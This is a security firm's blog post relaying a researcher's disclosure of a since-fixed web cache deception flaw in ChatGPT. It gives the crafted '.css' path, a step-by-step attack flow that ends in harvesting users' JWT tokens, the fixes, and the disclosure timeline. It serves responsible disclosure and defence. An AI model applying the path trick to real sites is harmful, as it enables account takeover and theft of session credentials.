Security Research

Shockwave Identifies Web Cache Deception and Account Takeover Vulnerability affecting OpenAI's ChatGPT

Security Research

Our founder has worked together with OpenAI's team to fix Account Takeover vulnerability that affected ChatGPT via Web Cache Deception, what seems to be the world's first Web Based Vulnerabilities affecting the most innovative product of many generations, read more on the detailed twitter thread

Blog Details as per the Twitter Thread

The team at @OpenAI just fixed a critical account takeover vulnerability I reported few hours ago affecting #ChatGPT. It was possible to takeover someone's account, view their chat history, and access their billing information without them ever realizing it.Breakdown below.

The vulnerability was "Web Cache Deception" and I'll explain in details how I managed to bypass the protections in place on https://chat.openai.com.It's important to note that the issue is fixed, and I received a "Kudos" email from @OpenAI's team for my responsible disclosure.

While exploring the requests that handle ChatGPT's authentication flow I was looking for any anomaly that might expose user information.The following GET request caught my attention:https://chat.openai[.]com/api/auth/session

Basically, whenever we login to our ChatGPT instance, they application will fetch our account context, as in our Email, Name, Image and accessToken from the server, it looks like the attached image below:

One common use-case to leak this kind of information is to exploit "Web Cache Deception" across the server, I've managed to find it several times already in Live Hacking Events, and It's also well documented across various blogs, such as:https://omergil.blogspot.com/2017/02/web-cache-deception-attack.html

In high-level view, the vulnerability is quite simple, if we manage to force the Load Balancer into caching our request on a specific crafted path of ours, we will be able to read our victim's sensitive data from the cached response.It wasn't straight-forward in this case.

In-order for the exploit to work, we need to make the CF-Cache-Status response to acknowledge a cached "HIT", which means that it cached the data, and it will be served to the next request across the same region.We receive "DYNAMIC" response, that wouldn't cache the data.

Now, getting into the interesting part.When we deploy web servers, the main goal of "Caching" is the ability to serve our heavy resources faster to the end-user, mostly JS / CSS / Static files, CloudFlare has a list of default extensions that gets cached behind their Load Balancers. https://developers.cloudflare.com/cache/about/default-cache-behavior/

"Cloudflare only caches based on file extension and not by MIME type"

Basically, if we manage to find a way to load the same endpoint with one of the specified file extensions below, while forcing the endpoint to keep the Sensitive JSON data, we will be able to have it cached.

So, the first thing I would try is to fetch the resource with a file extension appended to the endpoint, and see if it would throw an error or display the original response.chat.openai[.]com/api/auth/session.css -> 400 - didn't work

chat.openai[.]com/api/auth/session/test.css - 200 - success

This was very promising, @OpenAI would still return the sensitive JSON with css file extension, it might have been due to fail regex or just them not taking this attack vector into contextOnly one thing left to check, whether we can pull a "HIT" from the LB Cache server.

And perfect, we had our full chain working as planned.

Attack Flow:

1. Attacker crafts a dedicated .css path of the /api/auth/session endpoint.

2. Attacker distributes the link (either directly to a victim or publicly)

3. Victims visit the legitimate link.

4. Response is cached.

5. Attacker harvests JWT Credentials.Access Granted.


1. Manually instruct the caching server to not catch the endpoint through a regex  - (this is the fix @OpenAI chose)

2. Don't return the sensitive JSON response unless you directly request the desired endpoint http://chat.openai.com/api/auth/session… != http://chat.openai.com/api/auth/session/test.css

Vulnerability Disclosure Process from @OpenAI:

1. Email sent at 19:54 to disclosure@openai.com

2. First response 20:02

3. First fix attempt 20:40

4. Production fix 21:31

That's a wrap from my side, although I didn't get any financial compensation, It feels good to increase innovative products security posture.

Few notes:

1. Security is hard.

2. Adopt the power of the crowd.

3. Kudos on fast production fix.

Enjoyed this read?

Interested in discovering how Shockwave's Next-Gen Attack Surface Management platform can provide continuous monitoring of your external assets and identify exploitable risks? Drop your email below to stay informed.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Secure Your
Externally facing
Attack Surface Today!

Subscribe using Stripe

No meetings required